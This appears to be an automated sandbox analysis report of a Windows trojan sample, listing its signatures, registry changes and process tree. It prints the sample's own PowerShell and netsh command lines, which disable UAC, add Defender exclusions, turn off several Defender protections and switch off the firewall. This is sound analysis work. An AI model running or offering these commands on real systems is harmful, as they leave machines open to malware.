525c7562d9f07b07e1bf4a92543ab81576abc61c2ea074f82426b5f0f54df2ec

Analysis

max time kernel
4294178s
max time network
120s
platform
windows7_x64
resource
win7-20220311-en
submitted
28-03-2022 18:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

525c7562.exe
Size

392KB
MD5

cb2378c76f2e317525717d7650443c9e
SHA1

4fafea299cc6a48a7e8823a32139e8632a72ea8f
SHA256

525c7562d9f07b07e1bf4a92543ab81576abc61c2ea074f82426b5f0f54df2ec
SHA512

67a4c1a620feca6f814427467a1a62f7246a72a65c3f1c74eef5ef37a2cccd39be21535734819f762c58f06ac2da2a2e5285c2aee186e025c73cb2701b2cd763

Score

10^/10

evasion trojan

Malware Config

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

1800 bitsadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
1800	bitsadmin.exe

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

620 WINWORD.EXE

pid	process
620	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1612	powershell.exe
1452	powershell.exe
556	powershell.exe
1972	powershell.exe
276	powershell.exe
1932	powershell.exe
1928	powershell.exe
1452	powershell.exe
556	powershell.exe
1504	powershell.exe
1472	powershell.exe
600	powershell.exe
1520	powershell.exe
1800	powershell.exe
864	powershell.exe
804	powershell.exe
768	powershell.exe
2032	powershell.exe
1716	powershell.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	276	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	1452	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	1504	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	600	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

620 WINWORD.EXE
620 WINWORD.EXE

pid	process
620	WINWORD.EXE
620	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

525c7562.exeWScript.execmd.exeWINWORD.EXE

description	pid	process	target process
PID 1608 wrote to memory of 768	1608	525c7562.exe	WScript.exe
PID 1608 wrote to memory of 768	1608	525c7562.exe	WScript.exe
PID 1608 wrote to memory of 768	1608	525c7562.exe	WScript.exe
PID 1608 wrote to memory of 768	1608	525c7562.exe	WScript.exe
PID 768 wrote to memory of 620	768	WScript.exe	WINWORD.EXE
PID 768 wrote to memory of 620	768	WScript.exe	WINWORD.EXE
PID 768 wrote to memory of 620	768	WScript.exe	WINWORD.EXE
PID 768 wrote to memory of 620	768	WScript.exe	WINWORD.EXE
PID 768 wrote to memory of 1916	768	WScript.exe	cmd.exe
PID 768 wrote to memory of 1916	768	WScript.exe	cmd.exe
PID 768 wrote to memory of 1916	768	WScript.exe	cmd.exe
PID 768 wrote to memory of 1916	768	WScript.exe	cmd.exe
PID 1916 wrote to memory of 1612	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1612	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1612	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1612	1916	cmd.exe	powershell.exe
PID 620 wrote to memory of 996	620	WINWORD.EXE	splwow64.exe
PID 620 wrote to memory of 996	620	WINWORD.EXE	splwow64.exe
PID 620 wrote to memory of 996	620	WINWORD.EXE	splwow64.exe
PID 620 wrote to memory of 996	620	WINWORD.EXE	splwow64.exe
PID 1916 wrote to memory of 1452	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1452	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1452	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1452	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 556	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 556	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 556	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 556	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1972	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1972	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1972	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1972	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 276	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 276	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 276	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 276	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1932	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1932	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1932	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1932	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1928	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1928	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1928	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1928	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1452	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1452	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1452	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1452	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 556	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 556	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 556	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 556	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1504	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1504	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1504	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1504	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1472	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1472	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1472	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 1472	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 600	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 600	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 600	1916	cmd.exe	powershell.exe
PID 1916 wrote to memory of 600	1916	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\525c7562.exe
"C:\Users\Admin\AppData\Local\Temp\525c7562.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:768

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RarSFX0\document.docx"
3⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:620

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
4⤵
PID:996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RarSFX0\first.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:1916

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:556

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:600

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\netsh.exe
